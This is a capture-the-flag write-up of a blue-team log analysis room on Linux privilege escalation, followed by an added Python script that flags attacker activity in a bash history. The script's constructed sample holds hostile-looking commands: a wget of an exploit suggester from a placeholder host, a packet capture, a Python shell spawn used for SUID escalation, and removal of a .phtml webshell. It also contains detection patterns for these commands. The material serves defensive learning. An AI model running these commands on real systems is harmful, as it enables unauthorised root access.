/ctf/btlo/loganalysis_privesc

Krafter
4 min read · Jul 22, 2021

First off, thank you Josh Mason / Cyber Supply Drop & BTLO / Security Blue Team for bringing this challenge and learning opportunity to aspiring cybersecurity practitioners.

Spent quite the enjoyable afternoon checking out this platform after hearing only great things on Reddit/LinkedIn from various industry practitioners.

The platform is exceptionally well-built and I can see why the BTL1 certification is highly regarded.

Key takeaways that I enjoy from the platform —

Minimal handholding even in the Easy rooms.
Clean, well structured UI.
Great leaderboard system that makes me want to work harder.
Great room scenario descriptions!

Once my Blue Team skills get up to scratch, I’m super keen on trying their Investigations.

Decided to do a write up on one of the rooms I completed but WAIT.

Glad I decided to read up on the rules, so I instead attempted a retired challenge and will be doing a write up on —

Log Analysis — Privilege Escalation
A server with sensitive data was accessed by an attacker and the files were posted on an underground forum. This data was only available to a privileged user, in this case the ‘root’ account. Responders say ‘www-data’ would be the logged in user if the server was remotely accessed, and this user doesn’t have access to the data. The developer stated that the server is hosting a PHP-based website and that proper filtering is in place to prevent php file uploads to gain malicious code execution. The bash history is provided to you but the recorded commands don’t appear to be related to the attack.

Can you find what actually happened?
I enjoy the dramatic flair.

Having done some study on Linux privilege escalation recently, I figured this would be a good challenge to put some of that knowledge to practice.

The Bash Log

What user (other than root) is present on the server?
Going through the logs, we can see that the attacker has managed to enter the home directory of the user “daniel”.

What script did the attacker try to download to the server?
Through the wget command, the attacker has tried to download LES — Linux Exploit Suggester.

What packet analyzer tool did the attacker try to use?
The attacker utilized tcpdump, a CLI packet analyzer which is installed by default on most Linux distributions.

What file extension did the attacker use to bypass the upload filter implemented by the developer?
We can see at the very end where the attacker has removed a file from the uploads directory of the server, x.phtml. Whilst most developers will filter the .php extension from being uploaded to a server, a blocklist of that one extension misses the many alternative extensions (such as .phtml) that the web server may still hand to the PHP interpreter, so they can evade filters.

Based on the commands run by the attacker before removing the php shell, what misconfiguration was exploited in the ‘python’ binary to gain root-level access?
By leveraging an SUID misconfiguration on the Python binary, the attacker managed to escalate their privileges to “root” by spawning a shell from Python.

What is an SUID misconfiguration?

And by heading to trusty GTFOBins, we can see the exact same command run to leverage the SUID misconfiguration.
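As an added example (not part of the original writeup or the challenge files), here is a small triage script that runs the same kind of indicator checks over a constructed bash history and maps the hits onto the room's questions. The sample lines, the download URL and the rule names are assumptions made for the demo.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample history (hypothetical, not the challenge's real log) with
# the kinds of entries the writeup walks through.
SAMPLE_HISTORY = """\
cd /home/daniel
ls -la
wget https://example.invalid/linux-exploit-suggester.sh
tcpdump -i eth0 -w /tmp/cap.pcap
python -c 'import os; os.system("/bin/sh")'
rm /var/www/html/uploads/x.phtml
"""

# Each rule: (tag, regex). Group 1, when present, is the value worth reporting.
RULES: List[Tuple[str, str]] = [
    ("home_dir_access", r"\bcd\s+/home/([A-Za-z0-9_-]+)"),
    ("exploit_suggester", r"\b(?:wget|curl)\b.*?([\w.-]*linux-exploit-suggester[\w.-]*)"),
    ("packet_capture", r"\b(tcpdump)\b"),
    # python -c spawning a shell: only a root shell if python carries the SUID bit,
    # so confirm on the host with: ls -l "$(command -v python)" (look for the 's' bit).
    ("python_shell", r"\b(python[0-9.]*)\s+-c\b.*(?:/bin/)?(?:ba|da)?sh\b"),
    # Deleting an upload whose extension is a PHP alias that a naive .php filter misses.
    ("webshell_cleanup", r"\brm\b.*?/uploads/[\w.-]+\.(phtml|phar|php[3457]?|phps)\b"),
]
COMPILED = [(tag, re.compile(pat)) for tag, pat in RULES]


def triage(history: str) -> List[Tuple[int, str, str, str]]:
    """Return (line_no, tag, captured_value, raw_line) for each matching command."""
    findings = []
    for n, line in enumerate(history.splitlines(), start=1):
        for tag, rx in COMPILED:
            m = rx.search(line)
            if m:
                value = m.group(1) if m.groups() else ""
                findings.append((n, tag, value, line))
    return findings


def answer_questions(history: str) -> Dict[str, str]:
    """Map the triage findings onto the writeup's questions (last hit per tag wins)."""
    by_tag = {tag: value for _, tag, value, _ in triage(history)}
    return {
        "other_user": by_tag.get("home_dir_access", "unknown"),
        "downloaded_script": by_tag.get("exploit_suggester", "unknown"),
        "packet_analyzer": by_tag.get("packet_capture", "unknown"),
        "upload_extension": by_tag.get("webshell_cleanup", "unknown"),
        "suid_candidate": by_tag.get("python_shell", "unknown"),
    }
```

Running `answer_questions(SAMPLE_HISTORY)` on the constructed history returns daniel, linux-exploit-suggester.sh, tcpdump, phtml and python; the python hit is only a candidate until the binary's permission bits are checked on the host.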
